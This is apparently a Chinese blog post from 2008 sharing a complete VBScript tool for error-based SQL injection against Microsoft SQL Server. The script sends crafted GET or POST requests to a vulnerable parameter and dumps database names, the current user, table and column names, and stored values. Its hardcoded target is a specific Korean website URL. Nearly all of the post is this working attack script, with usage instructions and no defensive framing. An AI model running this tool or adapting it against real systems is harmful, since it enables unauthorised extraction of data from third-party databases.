Sql2005注射辅助脚本[粗糙版]

查看文章

Sql2005注射辅助脚本[粗糙版]

2008/04/14 01:09 P.M.

'***********************************************************************************************
'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com
'亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。
'***********************************************************************************************
'为了保持脚本的通用性，放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行，更多的设置要自己修改
'更多功能请大家自己加入

Const method = "Get" '提交方式请修改此处,有get和post可选
Const DisPlay = "D" 'S 保存到文件，D输出到屏幕

Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD

strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'" '基于注射点的不确定性，此处请手工更改
i = 1 '库的基数
k = 0 '表和字段的基数
MyArray = Split(strUrl_B, "?", -1, 1)
strUrl = MyArray(0) '取url
strArg = MyArray(1) '取参数
Set Args = Wscript.Arguments

If Args.Count = 0 Then
ShowU
End If
'If Args.Count =1 And LCase(Args(0))

'************************************************************************
'                              爆库
'************************************************************************
If Args.Count =1 Then
If LCase(Trim(Args(0)))="databases" Then
   ResuT("---------------===============================--------------")
   ResuT("All The DataBases:")

   Do
    strData = " and quotename(db_name("&i&"))=0--"
    sqlInj(strData)
    i = i + 1
   Loop Until StrD=""
   ResuT("---------------===============================--------------")
   Wscript.Quit
ElseIf LCase(Trim(Args(0)))= "info" then
   ResuT("---------------===============================--------------")
   ResuT("The Current Database is:")
   strData = " and quotename(db_name())=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   ResuT("The database User is:")
   strData = " and quotename(user)=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   ResuT("The System_user is:")
   strData = " and quotename(System_user)=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   Wscript.Quit
End If
End If
'************************************************************************
'                              爆表
'************************************************************************
If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then
ResuT("---------------===============================--------------")
ResuT("The Tables Of " & Args(0))
Do
   strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

'************************************************************************
'                             爆字段
'************************************************************************
If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then
Database = Args(0)
Table = Args(1)
TarGet = DataBase & ".dbo." & Table
TarGetCol = Database & ".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("The Columns Of " & TarGet)
Do
   strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

'************************************************************************
'                              爆字段值
'************************************************************************
If Args.Count=4 And LCase(Trim(Args(3)))="values" Then
Database = Args(0)
Table = Args(1)
col = Args(2)
Target = Database & ".dbo." & Table
ResuT("---------------===============================--------------")
ResuT("The Values Of " & Args(2) & " in "&Target)
Do
   strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

Sub SqlInj(value)
If UCase(method) = "GET" Then
   value = strArg & value
   Set objXML = CreateObject("Microsoft.XMLHTTP")
   objXML.Open "GET", strUrl &"?" & value , False
   objXML.SetRequestHeader "Referer", strUrl
   'objXML.SetRequestHeader "Accept-Language", "EUC-KR"
   objXML.send()
   strRevS = objXML.ResponseText '默认用这个
   'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
   If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
    strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
    ResuT(" |_"&strD)
   Else
    strD = ""
   End If
ElseIf UCase(method) = "POST" Then
   value = strArg & value
   Set objXML = CreateObject("Microsoft.XMLHTTP")
   objXML.Open "POST", strUrl, False
   objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
   objXML.SetRequestHeader "Referer", strUrl
   objXML.send(UrlEncode(value))
   strRevS = objXML.ResponseText '默认用这个
   'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
   If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
    strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
    ResuT(" |_"&strD)
   Else
    strD = ""
   End If
End If
End Sub

Function ResuT(strInfo)
If UCase(DisPlay) = "S" Then
   Set fso = CreateObject("Scripting.FileSystemObject")
   Set fso1 = fso.OpenTextFile("result.txt",8,True)
   fso1.WriteLine(strInfo)
   fso1.Close
   Set fso = Nothing
ElseIf UCase(DisPlay) = "D" Then
   Wscript.Echo(strInfo)
End If
End Function

Function UrlEncode(str)
str = Replace(str," ","+")
UrlEncode = str
End Function

Function bytes2BSTR(vIn)
    strReturn = ""
    For i = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn,i,1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn,i+1,1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            i = i + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

Sub showU()
With Wscript
   .Echo("+--------------------------=====================------------------------------+")
   .Echo("Sql2005注射辅助脚本（粗糙版），用于mssql显错模式 By Tr4c3[at]126[Dot]com")
   .Echo("Usage:")
   .Echo(" cscript "&.ScriptName&" info--爆基本信息")
   .Echo(" cscript "&.ScriptName&" databases--爆所有库名")
   .Echo(" cscript "&.ScriptName&" pubs tables--爆库pubs里所有用户表名")
   .Echo(" cscript "&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名")
   .Echo(" cscript "&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值")
   .Echo("+--------------------------=====================------------------------------+")
   .Quit
End with
End Sub

类别：Original | 添加到搜藏 | 浏览() | 评论 (6)

姓　名：	*姓名最长为50字节

网址或邮箱：	(选填)

内　容：

验证码：	请点击后输入四位验证码，字母不区分大小写看不清?
	取消回复